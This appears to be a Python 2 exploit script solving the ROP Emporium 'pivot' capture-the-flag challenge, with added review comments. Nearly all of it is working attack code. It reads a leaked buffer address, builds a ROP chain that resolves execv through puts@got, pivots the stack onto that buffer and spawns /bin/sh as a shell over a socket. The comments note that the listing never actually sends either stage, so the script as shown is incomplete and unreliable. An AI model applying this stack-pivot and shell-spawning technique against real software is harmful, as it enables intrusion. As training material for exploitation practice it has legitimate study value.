Solution for ROP Emporium pivot's challenge (
It pops a remote shell.
Run the binary with: nc -lvc ./pivot -p 4444
Then run this exploit script against it :)
import socket
from struct import pack
import telnetlib
def p64(x):
    """Pack *x* as a little-endian signed 64-bit integer (struct format ``<q``).

    Values outside the signed range raise ``struct.error``; every address and
    offset used in this script fits comfortably.
    """
    little_endian_signed_qword = '<q'
    return pack(little_endian_signed_qword, x)
# NOTE: this is Python 2 code (print statements, str concatenated with the
# output of struct.pack); it does not run unchanged under Python 3.
#
# Overall flow: (1) connect to the listener wrapping the challenge binary,
# (2) read the address the binary prints ("to pivot: ..."), (3) build a
# first ROP stage that is placed in that buffer, (4) build a second stage
# that overflows the stack and moves rsp onto the first buffer (the
# "pivot"), (5) hand the socket to a Telnet object.
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)
# Empty host string -- presumably resolves to the local machine on the
# author's platform; an explicit "127.0.0.1" would be unambiguous. TODO confirm
s.connect(("", 4444))
data = s.recv(1000)
# print data
print "[+] Connected!"
# Keep reading until the marker preceding the pivot address arrives.
# No socket timeout is set, and recv() returns "" once the peer closes, so
# this loop blocks or spins forever if the marker never shows up (e.g. a
# different binary build).
while str.find(data, "to pivot: ") == -1:
    data += s.recv(1000)
# print data
# Take the 14 characters after the marker -- presumably "0x" plus twelve hex
# digits of the buffer address the binary prints; verify against the prompt.
pivot = str.find(data, "to pivot: ")
pivot = data[pivot+len("to pivot: "):pivot+len("to pivot: ")+14]
print "[+] Got Pivot: ", pivot
pivot = int(pivot, 16)
# Stage 1: the string execv() will receive, followed by the chain that
# runs once rsp points into this buffer.
command = '/bin/sh\x00'
rop = command
# The pivot gadget (stage 2, "pop rsp; pop r13; pop r14; pop r15; ret")
# pops three registers after switching stacks, so 24 bytes of filler are
# consumed here before the first real return address.
rop += 'C'*8*3 # r13, r14, r15
# All gadget addresses below are fixed for the author's copy of the binary
# (no PIE); 0x5D1D0 is the execv-puts distance in the author's libc and
# differs between libc builds -- that is why the chain resolves execv at
# run time from puts@got instead of hard-coding it.
rop += p64(0x400b00) # pop rax; ret; Set RAX=puts@got
rop += p64(0x602020) # puts@got
rop += p64(0x400900) # pop rbp; ret;
rop += p64(0x5D1D0) # execv-puts offset
rop += p64(0x400b05) # mov rax, qword [rax]; ret; Set RAX=*puts@got (real memory address)
rop += p64(0x400b09) # add rax, rbp; ret; Add offset to calculate the execv position in memory
rop += p64(0x400b73) # pop rdi; ret; prepare arguments for execv: execv(rdi="bin/sh", rsi=0x0=NULL)
rop += p64(pivot) # rdi
rop += p64(0x400b71) # pop rsi; pop r15; ret;
rop += p64(0x0) # rsi
rop += p64(0x0) # r15
rop += p64(0x400943) # jmp rax; Call execv (memory address calculated on RAX)
# Newline terminates the input line -- presumably the binary reads one line
# per prompt; confirm.
rop += '\n'
# NOTE(review): nothing in this listing writes `rop` to the socket before
# the next recv(); the "sent" message below suggests lines are missing from
# this copy -- confirm against the original gist.
data += s.recv(1000)
print "[+] Pivot ROP sent.."
# Stage 2: 40 bytes of padding up to the saved return address, then the
# stack-pivot gadget with rsp set just past the "/bin/sh\0" string in the
# first buffer (i.e. onto the 'C' filler above).
rop = 'A'*40
rop += p64(0x400b6d) # pop rsp; pop r13; pop r14; pop r15; ret; Create new stack frame on the first buffer (pivot)
rop += p64(pivot+len(command))
rop += 'B'*8
rop += '\n'
# NOTE(review): same as above -- this copy shows no send of the second stage.
print "[+] Overflow ROP sent.."
data += s.recv(1000)
print "[+] Shell popped!"
# Reuse the connected socket through telnetlib. telnetlib is deprecated
# since Python 3.11 and removed in 3.13 (PEP 594); nothing further is done
# with `t` in this listing.
t = telnetlib.Telnet()
t.sock = s